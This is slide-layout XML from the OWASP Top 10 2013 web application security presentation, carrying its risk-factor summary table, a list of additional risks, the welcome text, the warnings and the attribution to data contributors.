                <a:ext cx="575647" cy="238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49"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50" name="Rectangle 49"/>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Note About Risks</a:t>
            </a:r>
            <a:endParaRPr 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4177307505"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="1295400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="343850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Top 10 Risk Factor Summary</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following table presents a summary of the 2013 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> statistics and the experience of the OWASP Top 10 team</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. To</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> understand these risks for a particular application or organization, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>you must consider your own specific threat agents and business impacts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Even egregious software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</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3" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Details About Risk Factors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text Placeholder 64"/>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+F</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254775516"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2438400"/>
          <a:ext cx="6857999" cy="4066502"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="990600"/>
                <a:gridCol w="753602"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="1137523"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="791210"/>
              </a:tblGrid>
              <a:tr h="881612">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="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8489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A1-Injection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A2-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Authentication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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="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A3-XSS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A4-Insecure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> DOR</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A5-Misconfig</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A6-Sens.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> Data</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A7-Function</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> Acc.</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A8-CSRF</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A9-Components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A10-Redirects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21059497"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6553200"/>
          <a:ext cx="6858000" cy="2590800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="359606">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Additional Risks to Consider</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Top 10 cover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also consider include:</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4"/>
                        </a:rPr>
                        <a:t>Clickjacking</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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5"/>
                        </a:rPr>
                        <a:t>Concurrency Flaws</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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6"/>
                        </a:rPr>
                        <a:t>Denial of Service</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (Was 2004 Top 10 – Entry 2004-A9)</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7"/>
                        </a:rPr>
                        <a:t>Expression Language Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>CWE-917</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9"/>
                        </a:rPr>
                        <a:t>Information Leakage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Improper Error Handling</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (Was part of 2007 Top 10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Entry 2007-A6</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1"/>
                        </a:rPr>
                        <a:t>Insufficient Anti-automation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>CWE-799</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Insufficient Logging and Accountability (Related to 2007 Top 10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Entry 2007-A6</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3"/>
                        </a:rPr>
                        <a:t>Lack of Intrusion Detection and Response</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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4"/>
                        </a:rPr>
                        <a:t>Malicious File Execution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (Was 2007 Top 10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Entry 2007-A3</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5"/>
                        </a:rPr>
                        <a:t>Mass Assignment</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>CWE-915</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17"/>
                        </a:rPr>
                        <a:t>User Privacy</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30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3025209" y="3091161"/>
            <a:ext cx="712054" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Prevalence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094027" y="3091161"/>
            <a:ext cx="801823" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Detectability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1882209" y="3091161"/>
            <a:ext cx="817853" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploitability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282634" y="3091161"/>
            <a:ext cx="518091" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1066800" y="2620973"/>
            <a:ext cx="5714999" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6466548" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="Group 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6466548" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6466548" cy="585604"/>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40" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="49"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50"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1"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2"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3"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42" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="496468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43"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6"/>
                <a:ext cx="95239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47" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="600934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48" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="42" idx="4"/>
                <a:endCxn id="47" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5650481" y="1263956"/>
                <a:ext cx="358867"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991923"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8" name="Rectangle 37"/>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444" y="0"/>
            <a:ext cx="6887444" cy="914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83073141"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="245364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Welcome</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">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19711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Welcome to the OWASP Top 10 2013! </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>This update broadens one of the categories from the 2010 version to be more inclusive of common, important vulnerabilities, and reorders some of the others based on changing prevalence data.  It also brings component security into the spotlight by creating a specific category for this risk, pulling it out of the obscurity of the fine print of the 2010 risk A6: Security Misconfiguration.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OWASP Top 10 for 2013 is based on 8 datasets from 7 firms that specialize in application security, including 4 consulting companies and 3 tool/SaaS vendors (1 static, 1 dynamic, and 1 with both). This data spans over 500,000 vulnerabilities across hundreds of organizations and thousands of applications. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact estimates.</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primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="100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5928527"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3657601"/>
          <a:ext cx="3352800" cy="5486399"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="344420">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>Warnings</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-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5141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Don’t stop at 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. There are hundreds of issues that could affect the overall security of a web application as discussed in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Developer’s Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. These are</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>essential reading for anyone developing web applications. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Guidance on how to effectively find vulnerabilities in web applications is provided in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Code Review Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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Constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. This Top 10 will continue </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>change.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Even </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>without changing a single line of your application’s code, you</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> may become vulnerable as new flaws are discovered and attack methods are refined</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. Please review the advice at the end of the Top 10 in “W</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0" smtClean="0"/>
                        <a:t>hat’s Next For Developers, Verifiers, and Organizations” </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>for more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Think positive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. When you’re ready to stop chasing vulnerabilities and focus on establishing strong application security controls, O</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>WASP has produced the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> as a guide to organizations and application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> reviewers on what to verify.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="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Use tools wisely</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> vulnerabilities can be quite complex and buried in mountains of code. In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.</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Push left</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. Focus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> on making security an integral part of your culture throughout your development organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Find out more in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Open Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Rugged Handbook</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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96863582"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3657600"/>
          <a:ext cx="3429000" cy="5486400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="343829">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Attribution</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5142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Thanks to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Aspect Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> for initiating, leading, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>updating the OWASP Top 10 since its inception in 2003, and to its primary authors: Jeff Williams and Dave Wichers.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We’d like to thank those organizations that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>contributed their vulnerability prevalence data to support the 2013 update:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="600" baseline="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1"/>
                        </a:rPr>
                        <a:t>Aspect Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>Statistics</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="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3"/>
                        </a:rPr>
                        <a:t>HP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Statistics</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> from both Fortify and WebInspect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5"/>
                        </a:rPr>
                        <a:t>Minded Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>Statistics</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="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7"/>
                        </a:rPr>
                        <a:t>Softtek</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId18"/>
                        </a:rPr>
                        <a:t>Statistics</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>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9"/>
                        </a:rPr>
                        <a:t>Trustwave, SpiderLabs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>Statistics</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>  (See page 50)</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21"/>
